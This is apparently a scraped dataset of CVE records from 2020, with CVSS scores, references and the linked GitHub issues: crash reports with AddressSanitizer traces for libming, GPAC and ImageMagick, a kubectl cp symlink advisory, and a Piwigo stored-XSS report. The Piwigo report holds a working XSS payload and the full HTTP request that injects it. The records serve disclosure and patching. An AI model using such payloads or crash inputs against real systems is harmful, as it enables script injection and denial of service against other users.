{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/libming/libming/issues/190" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libming:libming:0.4.8:*:*:*:*:*:*:*", "matchCriteriaId": "DD92BC79-2548-4C6F-9BDD-26C12BDF68AC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/libming/libming/issues/190
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "libming", "libming" ]
swftophp $poc [libming_decompile762poc-out_of_mem-idx:0xfcd-0x0.zip](https://github.com/libming/libming/files/4028435/libming_decompile762poc-out_of_mem-idx.0xfcd-0x0.zip) asan output ``` root@ubuntu:/home/tim/libming/util# ../../asan/libming/util/swftophp overflows/libming_decompile762poc-out_of_mem-idx\:0xfcd-0x0 header indicates a filesize of 36374837 but filesize is 58 <?php $m = new SWFMovie(8); ming_setscale(1.0); $m->setRate(3.925781); $m->setDimension(0, 0); /* Note: xMin and/or yMin are not 0! */ $m->setFrames(4079); /* SWF_DOACTION */ AddressSanitizer:DEADLYSIGNAL ================================================================= ==2294==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x559547345499 bp 0x7fff7c524450 sp 0x7fff7c524420 T0) ==2294==The signal is caused by a READ memory access. ==2294==Hint: address points to the zero page. #0 0x559547345498 in decompileGETURL2 /home/tim/asan/libming/util/decompile.c:924 #1 0x559547350708 in decompileAction /home/tim/asan/libming/util/decompile.c:3236 #2 0x559547350ed6 in decompileActions /home/tim/asan/libming/util/decompile.c:3494 #3 0x55954735100c in decompile5Action /home/tim/asan/libming/util/decompile.c:3517 #4 0x55954733d007 in outputSWF_DOACTION /home/tim/asan/libming/util/outputscript.c:1551 #5 0x55954733f63a in outputBlock /home/tim/asan/libming/util/outputscript.c:2083 #6 0x559547340730 in readMovie /home/tim/asan/libming/util/main.c:281 #7 0x559547340eca in main /home/tim/asan/libming/util/main.c:354 #8 0x7fba80753b6a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x26b6a) #9 0x559547333469 in _start (/home/tim/asan/libming/util/swftophp+0x14469) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/tim/asan/libming/util/decompile.c:924 in decompileGETURL2 ==2294==ABORTING root@ubuntu:/home/tim/libming/util# vim ```
null pointer reference in decompileGETURL2
https://api.github.com/repos/libming/libming/issues/190/comments
0
2020-01-07T00:53:16Z
2020-01-07T00:53:16Z
https://github.com/libming/libming/issues/190
546,016,991
190
CVE-2020-6630
2020-01-09T02:15:13.590
An issue was discovered in GPAC version 0.8.0. There is a NULL pointer dereference in the function gf_isom_get_media_data_size() in isomedia/isom_read.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1377" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1377
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [ yes] I looked for a similar issue and couldn't find any. - [ yes] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [ yes] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ MP42TS -src $POC -dst-file /dev/null [count_video.zip](https://github.com/gpac/gpac/files/4014701/count_video.zip) asan output ``` root@ubuntu:/home/tim/gpac# ../gpac-asan/MP42TS -src crashes/count_video.mp4-signalb-0x0 -dst-file /dev/null AddressSanitizer:DEADLYSIGNAL ================================================================= ==112791==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000028 (pc 0x55e4a53e12e4 bp 0x602000000370 sp 0x7fffdb37dbe0 T0) ==112791==The signal is caused by a READ memory access. ==112791==Hint: address points to the zero page. #0 0x55e4a53e12e3 in gf_isom_get_media_data_size isomedia/isom_read.c:3312 #1 0x55e4a5391fdd in fill_isom_es_ifce /home/tim/gpac-asan/applications/mp42ts/main.c:620 #2 0x55e4a5391fdd in open_source /home/tim/gpac-asan/applications/mp42ts/main.c:1518 #3 0x55e4a53836c0 in parse_args /home/tim/gpac-asan/applications/mp42ts/main.c:2260 #4 0x55e4a53836c0 in main /home/tim/gpac-asan/applications/mp42ts/main.c:2465 #5 0x7f9a8b98ab6a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x26b6a) #6 0x55e4a53899c9 in _start (/home/tim/gpac-asan/MP42TS+0x1249c9) ```
null pointer reference in gf_isom_get_media_data_size
https://api.github.com/repos/gpac/gpac/issues/1377/comments
1
2020-01-02T00:45:04Z
2020-01-08T15:42:17Z
https://github.com/gpac/gpac/issues/1377
544,416,874
1,377
CVE-2020-6631
2020-01-09T02:15:13.653
An issue was discovered in GPAC version 0.8.0. There is a NULL pointer dereference in the function gf_m2ts_stream_process_pmt() in media_tools/m2ts_mux.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1378" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1378
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [ yes] I looked for a similar issue and couldn't find any. - [ yes] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [ yes] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ MP42TS -src $POC -dst-file /dev/null [count_video1.zip](https://github.com/gpac/gpac/files/4014702/count_video1.zip) asan output ``` root@ubuntu:/home/tim/gpac# ../gpac-asan/MP42TS -src crashes/count_video.mp4-signalb-0x198 -dst-file /dev/null Setting up program ID 1 - send rates: PSI 200 ms PCR 100 ms - PCR offset 0 AddressSanitizer:DEADLYSIGNAL ================================================================= ==115151==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000008 (pc 0x558236d3d311 bp 0x6080000008a0 sp 0x7ffd7d124a70 T0) ==115151==The signal is caused by a READ memory access. ==115151==Hint: address points to the zero page. #0 0x558236d3d310 in gf_m2ts_stream_process_pmt media_tools/m2ts_mux.c:718 #1 0x558236d4dfd1 in gf_m2ts_mux_table_update_bitrate media_tools/m2ts_mux.c:256 #2 0x558236d4dfd1 in gf_m2ts_mux_update_config media_tools/m2ts_mux.c:2543 #3 0x558236bcfffd in main /home/tim/gpac-asan/applications/mp42ts/main.c:2684 #4 0x7ff116424b6a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x26b6a) #5 0x558236bd59c9 in _start (/home/tim/gpac-asan/MP42TS+0x1249c9) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV media_tools/m2ts_mux.c:718 in gf_m2ts_stream_process_pmt ==115151==ABORTING ```
null pointer reference in gf_m2ts_stream_process_pmt
https://api.github.com/repos/gpac/gpac/issues/1378/comments
2
2020-01-02T00:49:55Z
2020-01-17T15:09:51Z
https://github.com/gpac/gpac/issues/1378
544,417,280
1,378
CVE-2019-11251
2020-02-03T16:15:11.140
The Kubernetes kubectl cp command in versions 1.1-1.12, and versions prior to 1.13.11, 1.14.7, and 1.15.4 allows a combination of two symlinks provided by tar output of a malicious container to place a file outside of the destination directory specified in the kubectl cp invocation. This could be used to allow an attacker to place a nefarious file using a symlink, outside of the destination tree.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.7, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 2.1, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" }, { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 3.6, "source": "[email protected]", "type": "Secondary" } ] }
[ { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/87773" }, { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://groups.google.com/d/msg/kubernetes-announce/YYtEFdFimZ4/nZnOezZuBgAJ" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "8E20ECB8-B503-4DB2-BCDB-D28E53523C9E", "versionEndExcluding": "1.13.11", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.13.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "CFCC3601-5C5D-4304-AE8E-E75F262A5CC6", "versionEndExcluding": "1.14.7", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.14.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "7A4A079B-AA15-49F4-9861-D99D6FAEE758", "versionEndExcluding": "1.15.4", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.15.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:1.1-1.12:*:*:*:*:*:*:*", "matchCriteriaId": "DF182631-B804-429A-A1EC-B9BCE60FDA93", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/kubernetes/kubernetes/issues/87773
[ "Third Party Advisory" ]
github.com
[ "kubernetes", "kubernetes" ]
A security issue was discovered in kubectl versions v1.13.10, v1.14.6, and v1.15.3. The issue is of a medium severity and upgrading of kubectl is encouraged to fix the vulnerability. **Am I vulnerable?** Run kubectl version --client and if it returns versions v1.13.10, v1.14.6, and v1.15.3, you are running a vulnerable version. **How do I upgrade?** Follow installation instructions [here](https://kubernetes.io/docs/tasks/tools/install-kubectl/) **Vulnerability Details** The details for this vulnerability are very similar to CVE-2019-1002101 and CVE-2019-11246. A vulnerability has been discovered in kubectl cp that allows a combination of two symlinks to copy a file outside of its destination directory. This could be used to allow an attacker to place a nefarious file using a symlink, outside of the destination tree. This issue is filed as CVE-2019-11251. Two fixes were formulated, one fix to remove symlink support going forwards and a fix with cherry picks made to ensure backwards compatibility. See https://github.com/kubernetes/kubernetes/pull/82143 for the primary fix in v1.16.0 which removes the support of symlinks in kubectl cp. After version 1.16.0, symlink support with kubectl cp is removed, it is recommended instead to use a combination of exec+tar. A second fix has been made to 1.15.4 and backported to 1.14.7 and 1.13.11. This changes the kubectl cp un-tar symlink logic, by unpacking the symlinks after all the regular files have been unpacked. This then guarantees that a file can’t be written through a symlink. See https://github.com/kubernetes/kubernetes/pull/82384 for the fix to version 1.15.4. The following Cherry picks were made from this fix to earlier versions of v1.14.7 and v1.13.11: See https://github.com/kubernetes/kubernetes/pull/82502 for version 1.14.7 See https://github.com/kubernetes/kubernetes/pull/82503 for version 1.13.11 Thank you to Erik Sjölund (@eriksjolund) for discovering this issue, Tim Allclair and Maciej Szulik for both fixes and the patch release managers for including the fix in their releases. /close
CVE-2019-11251: kubectl cp symlink vulnerability
https://api.github.com/repos/kubernetes/kubernetes/issues/87773/comments
3
2020-02-03T15:12:22Z
2022-10-14T02:00:16Z
https://github.com/kubernetes/kubernetes/issues/87773
559,146,411
87,773
CVE-2016-7523
2020-02-06T14:15:10.737
coders/meta.c in ImageMagick allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2016/09/22/2" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://bugs.launchpad.net/ubuntu/+source/imagemagick/+bug/1537420" }, { "source": "[email protected]", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1378754" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/94" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:-:*:*:*:*:*:*:*", "matchCriteriaId": "6E6BE7A5-6FF7-4916-B671-9EE11CA54F65", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/ImageMagick/ImageMagick/issues/94
[ "Exploit", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
https://bugs.launchpad.net/ubuntu/+source/imagemagick/+bug/1537420
heap-buffer-overflow in coders/meta.c:496
https://api.github.com/repos/ImageMagick/ImageMagick/issues/94/comments
2
2016-01-24T01:29:08Z
2016-01-25T00:23:16Z
https://github.com/ImageMagick/ImageMagick/issues/94
128,365,381
94
CVE-2016-7524
2020-02-06T14:15:10.830
coders/meta.c in ImageMagick allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2016/09/22/2" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://bugs.launchpad.net/ubuntu/+source/imagemagick/+bug/1537422" }, { "source": "[email protected]", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1378762" }, { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/97c9f438a9b3454d085895f4d1f66389fd22a0fb" }, { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/f8c318d462270b03e77f082e2a3a32867cacd3c6" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/96" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:-:*:*:*:*:*:*:*", "matchCriteriaId": "6E6BE7A5-6FF7-4916-B671-9EE11CA54F65", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/ImageMagick/ImageMagick/issues/96
[ "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
https://bugs.launchpad.net/ubuntu/+source/imagemagick/+bug/1537422
heap-buffer-overflow in coders/meta.c:465
https://api.github.com/repos/ImageMagick/ImageMagick/issues/96/comments
3
2016-01-24T01:29:30Z
2020-02-10T03:00:49Z
https://github.com/ImageMagick/ImageMagick/issues/96
128,365,398
96
CVE-2020-8089
2020-02-10T16:15:14.267
Piwigo 2.10.1 is affected by stored XSS via the Group Name Field to the group_list page.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Piwigo/Piwigo/issues/1150" }, { "source": "[email protected]", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://piwigo.org/forum/viewforum.php?id=23" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:piwigo:piwigo:2.10.1:*:*:*:*:*:*:*", "matchCriteriaId": "8E8B6457-1AF4-4B29-AF6E-9682E45BB2A9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/Piwigo/Piwigo/issues/1150
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Piwigo", "Piwigo" ]
Description: Piwigo version 2.10.1 is affected by stored cross site scripting vulnerability. This vulnerability exists in "Group Name" Field in "group_list" page. How to reproduce: 1. Login into the application. 2. Go to the "Users" -> "Groups" page from life navigation menu. 3. Click on "Add Group" button and then in "Group Name" field insert the payload <img src="X" onerror="alert(document.domain)"> and hit add button. CVSS Score: CVSS:3.0/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:N ********************************************************************************************************* POST /piwig/admin.php?page=group_list HTTP/1.1 Host: 172.16.163.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 122 Origin: http://172.16.163.1 Connection: close Cookie: pwg_display_thumbnail=no_display_thumbnail; phavsz=1141x490x1; pwg_id=i6juu2ls6m174g1f0abcjodjs7; user_auth=eyJpdiI6IkxnaGp4T0RGd1BiK2VDUzNWNHpRdlE9PSIsInZhbHVlIjoiU29tK1pzdDQzUDBKcWlRZk5VN04wVUNxR1JXUjdBd1Q5QUtOaUJRbUhyNGVjc0xETWUwWFd0RkpBV2ZJOFBKd3R4N2o2clNTRlhWaWtmc2ttQ2dMM3VrWU0rZ1B5cDJlZnpoUGFCZ2hmaHpJTURTVXJQdCtlbEpyeEp6RzhNUVAiLCJtYWMiOiI4YjY2NTU4N2JhOTc2MzkyZTcwOTQyNWQ3OThkNDZkZjMyODgxYjhjZGQ0NGQ2NTFhMjg3NWRmMzM2OGIwZDYzIn0%3D groupname=%3Cimg+src%3DX+onerror%3Dalert%28document.domain%29%3E&submit_add=Add&pwg_token=46695f2721b77a2840903ba6298796be ********************************************************************************************************* ![Create_Group_title](https://user-images.githubusercontent.com/25206084/72731247-5b00f780-3bb9-11ea-908e-5a57f0f7c4d6.JPG) ![Create_Group_title_2](https://user-images.githubusercontent.com/25206084/72731283-6d7b3100-3bb9-11ea-9e5a-5b5d9914934b.JPG)
Stored Cross-Site Scripting vulnerability in Piwigo CMS
https://api.github.com/repos/Piwigo/Piwigo/issues/1150/comments
1
2020-01-20T13:47:13Z
2020-03-25T14:32:53Z
https://github.com/Piwigo/Piwigo/issues/1150
552,310,420
1,150
CVE-2020-10251
2020-03-10T04:15:11.533
In ImageMagick 7.0.9, an out-of-bounds read vulnerability exists within the ReadHEICImageByID function in coders\heic.c. It can be triggered via an image with a width or height value that exceeds the actual size of the image.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1859" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.9:*:*:*:*:*:*:*", "matchCriteriaId": "5A044015-839F-4D63-A002-1F7806C41365", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/ImageMagick/ImageMagick/issues/1859
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
